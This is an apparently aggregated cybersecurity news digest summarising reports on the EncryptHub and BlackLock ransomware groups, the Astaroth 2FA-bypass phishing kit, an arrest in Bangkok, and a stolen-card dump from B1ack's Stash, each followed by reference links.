The cybercriminal group EncryptHub, also known as LARVA-208, has successfully breached 618 organizations globally since June 2024. The group utilizes sophisticated social engineering techniques, including spear-phishing, to steal credentials and deploy ransomware on corporate networks. The attacks are designed to compromise systems and steal sensitive information, showcasing a high level of sophistication and a clear focus on targeting businesses worldwide.
LARVA-208's methods involve impersonating IT personnel and deceiving employees into divulging VPN credentials or installing remote management software. They have also been observed registering domain names mimicking popular VPN services to enhance the credibility of their phishing campaigns. After gaining access, the group deploys custom-developed PowerShell scripts to install information-stealing malware and ransomware, encrypting files on compromised systems and demanding cryptocurrency payments via ransom notes left on the victim device.
Recommended read:
References :
- gbhackers.com: GBHackers article about LARVA-208 Hackers Compromise 618 Organizations Stealing Logins and Deploying Ransomware
- Talkback Resources: TalkBack describes EncryptHub Exposed: 600+ Targets Hit by LARVA-208
- The420.in: The420 article about EncryptHubTargets 618 Organizations with Phishing and Ransomware Attacks
- bsky.app: A threat actor tracked as 'EncryptHub,' aka Larva-208, has been targeting organizations worldwide with spear-phishing and social engineering attacks to gain access to corporate networks.
@www.reliaquest.com
//
ReliaQuest researchers are warning that the BlackLock ransomware group is poised to become the most prolific ransomware-as-a-service (RaaS) operation in 2025. BlackLock, also known as El Dorado, first emerged in early 2024 and quickly ascended the ranks of ransomware groups. By the fourth quarter of 2024, it was already the seventh most prolific group based on data leaks, experiencing a massive 1,425% increase in activity compared to the previous quarter.
BlackLock's success is attributed to its active presence and strong reputation within the RAMP forum, a Russian-language platform for ransomware activities. The group is also known for its aggressive recruitment of traffers, initial access brokers, and affiliates. They employ double extortion tactics, encrypting data and exfiltrating sensitive information, then threatening to publish it if a ransom is not paid. Their custom-built ransomware targets Windows, VMware ESXi, and Linux environments.
Recommended read:
References :
- AAKL: ReliaQuest: Threat Spotlight: Inside the World’s Fastest Rising Ransomware Operator — BlackLock More: Infosecurity-Magazine: BlackLock On Track to Be 2025’s Most Prolific Ransomware Group
- Christoffer S.: ReliaQuest Inside the World’s Fastest Rising Ransomware Operator - BlackLock Somewhat of a deep dive into a relatively new RaaS (BlackLock), a very active group both on RAMP and with adding new victims to their leaksite.
- www.helpnetsecurity.com: BlackLock ransomware onslaught: What to expect and how to fight it
- www.reliaquest.com: ReliaQuest: Threat Spotlight: Inside the World’s Fastest Rising Ransomware Operator — BlackLock
- Help Net Security: In-depth analysis of the BlackLock ransomware group and their operational methods.
- www.infosecurity-magazine.com: ReliaQuest: Threat Spotlight: Inside the World’s Fastest Rising Ransomware Operator — BlackLock More: Infosecurity-Magazine: BlackLock On Track to Be 2025’s Most Prolific Ransomware Group
- cyberpress.org: BlackLock Ransomware Evolves: Threatens Windows, VMware ESXi, and Linux Systems
- gbhackers.com: BlackLock Ransomware Targets Windows, VMware ESXi, & Linux Environments
- Cyber Security News: BlackLock Ransomware Evolves: Threatens Windows, VMware ESXi, and Linux Systems
Daniel Kelley@SlashNext
//
A new phishing kit named Astaroth has emerged as a significant threat, targeting Microsoft, Gmail, Yahoo, AOL, Office 365, and other third-party login services. It uses an evilginx-style reverse proxy to perform man-in-the-middle attacks, enabling it to bypass two-factor authentication (2FA). Discovered on cybercrime marketplaces, Astaroth employs advanced techniques like session hijacking and real-time credential interception to dynamically retrieve authorization tokens, 2FA tokens, and session cookies, unlike traditional phishing tools.
Astaroth operates by redirecting victims to malicious servers mimicking legitimate login pages, complete with SSL certificates to avoid raising security warnings. The kit intercepts traffic in real-time, capturing login credentials and 2FA tokens before forwarding them to the legitimate server. Key features include bulletproof hosting and continuous updates for six months. It is marketed as an easy-to-use, 2-in-1 solution, costing $2000, and even includes pre-purchase testing to demonstrate its effectiveness in real-world attacks.
Recommended read:
References :
- Cyber Security News: Report on Astaroth 2FA phishing kit targeting multiple platforms.
- gbhackers.com: GBHackers article on the Astaroth kit.
- SlashNext: Phishing attacks continue to evolve, pushing even the most secure authentication methods to their limits. First advertised on cybercrime networks in late January 2025, Astaroth is a brand new phishing kit that bypasses two-factor authentication (2FA) through session hijacking and real-time credential interception.
- cyberpress.org: Astaroth 2FA Phishing Kit Exploits Gmail, Yahoo, Office 365, and Third-Party Accounts
- slashnext.com: Astaroth: A New 2FA Phishing Kit Targeting Gmail, Yahoo, AOL, O365, and 3rd-Party Logins
- www.cysecurity.news: Details about Astaroth, including its features and marketing.
- MSSP feed for Latest: MSSPalert brief on the Astaroth phishing kit.
- hackread.com: Astaroth Phishing Kit Bypasses 2FA to Hijack Gmail and Microsoft Accounts
Dissent@DataBreaches.Net
//
A cybercriminal responsible for over 90 data leaks has been apprehended in Bangkok following a joint operation between the Royal Thai Police and the Singapore Police Force. The individual, known under aliases such as ALTDOS, DESORDEN, GHOSTR, and 0mid16B, targeted 65 organizations in the Asia-Pacific region and an additional 25 global targets. Between 2020 and February 2025, the hacker exfiltrated a staggering 13 terabytes of sensitive data from various sectors, including healthcare and finance.
The arrest marks a significant win in the fight against cybercrime, with authorities seizing laptops and other electronic devices during the raid in Thailand. Investigations revealed the suspect's involvement in attacks affecting multinational corporations, small businesses, and government databases across several countries, including Thailand, India, Indonesia, the UK, and the United States. The hacker allegedly worked alone, selling stolen data. The cybercriminal initially focused on Thai entities, later expanding operations across the Asia-Pacific region.
Recommended read:
References :
- gbhackers.com: Authorities Arrested Hacker Behind 90 Major Data Breaches Worldwide
- DataBreaches.Net: Criminal hacker known as ALTDOS, DESORDEN, GHOSTR and 0mid16B arrested
- CyberInsider: Cybercriminal Behind 90+ Data Leaks Arrested in Bangkok
@cyberinsider.com
//
B1ack's Stash, an illicit carding marketplace, released a dataset containing over 1 million stolen credit and debit cards on a dark web forum on February 19, 2025. Experts warn that the release of over 1 million unique cards appears to be a marketing strategy to attract new customers and gain notoriety within the cybercrime ecosystem. Other underground marketplaces, such as Joker Stash and BidenCash, also facilitate the sale of payment card data.
The cybersecurity community is on high alert. The leaked data reportedly includes the primary account number (PAN), expiration date, CVV2, cardholders' personal details, email address, IP address, and User-Agent, obtained through e-skimming. Banking institutions are being advised to monitor the dark web for offerings of their credit and debit cards so they can block the affected cards before they are used fraudulently.
Recommended read:
References :
- cyberinsider.com: On February 19, 2025, the illicit carding marketplace B1ack's Stash released a dataset containing over 1 million stolen credit and debit cards on a dark web forum.
- securityaffairs.com: Experts warn that the carding website B1ack’s Stash released a collection of over 1 million unique credit and debit cards.
- Talkback Resources: Carding website B1acks Stash released over 1 million credit and debit cards to attract customers, while underground marketplaces like Joker Stash and BidenCash facilitate the sale of payment card data, prompting banks to monitor the dark web for fraudulent activities.
- CyberInsider: On February 19, 2025, the illicit carding marketplace B1ack's Stash released a dataset containing over 1 million stolen credit and debit cards on a dark web forum.
- ciso2ciso.com: B1ack’s Stash released 1 Million credit cards